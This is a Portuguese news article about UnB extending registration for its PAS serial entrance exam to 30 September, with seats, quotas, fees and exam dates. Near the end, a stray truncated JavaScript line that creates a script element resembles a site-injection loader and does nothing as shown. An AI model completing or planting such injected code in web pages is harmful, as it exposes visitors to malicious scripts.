UnB prorroga pela 2ª vez prazo para inscrição do PAS; limite é dia 30

 
Candidatos realizam as provas do segundo dia do 2º Vestibular da Universidade de Brasília (UnB) de 2013 (Foto: Reprodução/ TV Globo)
Candidatos realizam provas para ingressar na Universidade de Brasília (UnB) de 2013 (Foto: Reprodução/ TV Globo)

 

A Universidade de Brasília (UnB) prorrogou pela segunda vez o prazo para estudantes do ensino médio concluírem a inscrição no Programa de Avaliação Seriada (PAS). O prazo limite, que era até o dia 20, passou para o dia 26 e agora vai até dia 30 de setembro. As provas serão aplicadas entre novembro e dezembro.

A inscrição é feita pelo site do Cespe, a banca examinadora. Os estudantes vão concorrer às 4.222 vagas distribuídas em 99 cursos dos quatro campi da UnB (Plano Piloto, Ceilândia, Gama e Planaltina). Para o primeiro semestre de 2017 há 2.112 vagas abertas e para o segundo, 2.110.

No momento da inscrição, o aluno deve indicar um dos sistemas de concorrência – universal, cotas para negros e cotas para escolas públicas. Também é necessário informar o campus, o curso e o turno da vaga desejada. A escolha poderá ser alterada por meio do Sistema Informatizado de Seleção para os Cursos de Graduação da UnB (SISUnB), após o candidato conhecer o desempenho nas provas e a nota de corte de cada curso.

Para confirmar a inscrição, os candidatos devem enviar uma fotografia digitalizada individual, colorida, com fundo branco e tirada em 2016, em que necessariamente apareça a cabeça descoberta e o tronco.

A isenção do pagamento da taxa de R$ 125 poderá ser solicitada caso o candidato se enquadre em uma das possibilidades previstas nos editais. Poderão ser beneficiados inscritos no Cadastro Único para Programas Sociais do Governo Federal (CadÚnico) e aqueles de família de baixa renda (até um salário mínimo e meio, equivalente a R$ 1.320), de acordo com o Decreto nº 6.135/2007.

 

Provas
As provas da primeira etapa do PAS – realizada ao final do 1º ano do ensino médio – serão aplicadas no dia 4 de dezembro. A segunda fase ocorre em 3 de dezembro e a terceira, no dia 27 de novembro.

As provas começam às 13h em todos os dias e os participantes têm cinco horas para resolver as questões e escrever a redação em Língua Portuguesa, obrigatória em todas as etapas.

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário